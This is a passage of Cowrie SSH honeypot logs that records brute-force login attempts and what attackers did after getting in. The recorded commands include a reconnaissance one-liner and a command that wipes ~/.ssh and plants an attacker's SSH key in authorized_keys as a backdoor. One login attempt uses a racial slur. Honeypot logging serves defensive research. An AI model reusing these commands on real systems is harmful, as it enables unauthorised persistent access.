56-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:49:48.425788Z","src_ip":"212.227.235.229","session":"9f8732c5e67a"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:49:49.343883Z","src_ip":"212.227.235.229","session":"0e3c054259ae"}
{"eventid":"cowrie.login.failed","username":"admin","password":"qwerty","message":"login attempt [admin/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-08T12:49:49.551886Z","src_ip":"212.227.235.229","session":"9f8732c5e67a"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:49:50.826123Z","src_ip":"212.227.235.229","session":"9f8732c5e67a"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":42710,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce4c07102a96","protocol":"ssh","message":"New connection: 134.199.174.250:42710 (1.2.3.4:22) [session: ce4c07102a96]","sensor":"my-vps","timestamp":"2025-09-08T12:50:08.228540Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:50:08.230791Z","src_ip":"134.199.174.250","session":"ce4c07102a96"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T12:50:08.524453Z","src_ip":"134.199.174.250","session":"ce4c07102a96"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123","message":"login attempt [root/admin123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:50:09.439967Z","src_ip":"134.199.174.250","session":"ce4c07102a96"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:50:10.054045Z","src_ip":"134.199.174.250","session":"ce4c07102a96"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T12:50:10.054902Z","src_ip":"134.199.174.250","session":"ce4c07102a96"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T12:50:10.055969Z","src_ip":"134.199.174.250","session":"ce4c07102a96"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T12:50:10.057520Z","src_ip":"134.199.174.250","session":"ce4c07102a96"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T12:50:10.058882Z","src_ip":"134.199.174.250","session":"ce4c07102a96"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T12:50:10.059860Z","src_ip":"134.199.174.250","session":"ce4c07102a96"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T12:50:10.060647Z","src_ip":"134.199.174.250","session":"ce4c07102a96"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T12:50:10.062211Z","src_ip":"134.199.174.250","session":"ce4c07102a96"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T12:50:10.062817Z","src_ip":"134.199.174.250","session":"ce4c07102a96"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T12:50:10.063370Z","src_ip":"134.199.174.250","session":"ce4c07102a96"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T12:50:10.063932Z","src_ip":"134.199.174.250","session":"ce4c07102a96"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T12:50:10.064888Z","src_ip":"134.199.174.250","session":"ce4c07102a96"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T12:50:10.065557Z","src_ip":"134.199.174.250","session":"ce4c07102a96"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T12:50:10.358021Z","src_ip":"134.199.174.250","session":"ce4c07102a96"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:50:10.359147Z","src_ip":"134.199.174.250","session":"ce4c07102a96"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:50:10.361022Z","src_ip":"134.199.174.250","session":"ce4c07102a96"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":57062,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0fc0556872a","protocol":"ssh","message":"New connection: 139.59.14.27:57062 (1.2.3.4:22) [session: d0fc0556872a]","sensor":"my-vps","timestamp":"2025-09-08T12:50:17.532403Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:50:17.533469Z","src_ip":"139.59.14.27","session":"d0fc0556872a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:50:17.859570Z","src_ip":"139.59.14.27","session":"d0fc0556872a"}
{"eventid":"cowrie.login.failed","username":"nigger","password":"nigger","message":"login attempt [nigger/nigger] failed","sensor":"my-vps","timestamp":"2025-09-08T12:50:19.192592Z","src_ip":"139.59.14.27","session":"d0fc0556872a"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:50:20.520680Z","src_ip":"139.59.14.27","session":"d0fc0556872a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38538,"dst_ip":"1.2.3.4","dst_port":22,"session":"030d85051a27","protocol":"ssh","message":"New connection: 212.227.235.229:38538 (1.2.3.4:22) [session: 030d85051a27]","sensor":"my-vps","timestamp":"2025-09-08T12:50:33.170996Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:50:33.172372Z","src_ip":"212.227.235.229","session":"030d85051a27"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:50:33.331066Z","src_ip":"212.227.235.229","session":"030d85051a27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49462,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a0adb1ea65d","protocol":"ssh","message":"New connection: 212.227.235.229:49462 (1.2.3.4:22) [session: 4a0adb1ea65d]","sensor":"my-vps","timestamp":"2025-09-08T12:50:33.407178Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:50:33.410221Z","src_ip":"212.227.235.229","session":"4a0adb1ea65d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:50:33.699274Z","src_ip":"212.227.235.229","session":"4a0adb1ea65d"}
{"eventid":"cowrie.login.success","username":"root","password":"huawei12345","message":"login attempt [root/huawei12345] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:50:34.010176Z","src_ip":"212.227.235.229","session":"030d85051a27"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:50:34.384219Z","src_ip":"212.227.235.229","session":"030d85051a27"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:50:34.384899Z","src_ip":"212.227.235.229","session":"030d85051a27"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:50:34.385798Z","src_ip":"212.227.235.229","session":"030d85051a27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42740,"dst_ip":"1.2.3.4","dst_port":22,"session":"786f406f797d","protocol":"ssh","message":"New connection: 212.227.235.229:42740 (1.2.3.4:22) [session: 786f406f797d]","sensor":"my-vps","timestamp":"2025-09-08T12:50:34.468552Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:50:34.469482Z","src_ip":"212.227.235.229","session":"786f406f797d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:50:34.547407Z","src_ip":"212.227.235.229","session":"030d85051a27"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:50:34.601180Z","src_ip":"212.227.235.229","session":"786f406f797d"}
{"eventid":"cowrie.login.failed","username":"daniel","password":"changeme","message":"login attempt [daniel/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T12:50:34.861525Z","src_ip":"212.227.235.229","session":"4a0adb1ea65d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:50:34.926489Z","src_ip":"212.227.235.229","session":"030d85051a27"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:50:34.927340Z","src_ip":"212.227.235.229","session":"030d85051a27"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:50:35.088587Z","src_ip":"212.227.235.229","session":"030d85051a27"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:50:35.089673Z","src_ip":"212.227.235.229","session":"030d85051a27"}
{"eventid":"cowrie.login.failed","username":"private","password":"Password","message":"login attempt [private/Password] failed","sensor":"my-vps","timestamp":"2025-09-08T12:50:35.193201Z","src_ip":"212.227.235.229","session":"786f406f797d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38544,"dst_ip":"1.2.3.4","dst_port":22,"session":"ced204051fb9","protocol":"ssh","message":"New connection: 212.227.235.229:38544 (1.2.3.4:22) [session: ced204051fb9]","sensor":"my-vps","timestamp":"2025-09-08T12:50:35.277273Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:50:35.278213Z","src_ip":"212.227.235.229","session":"ced204051fb9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac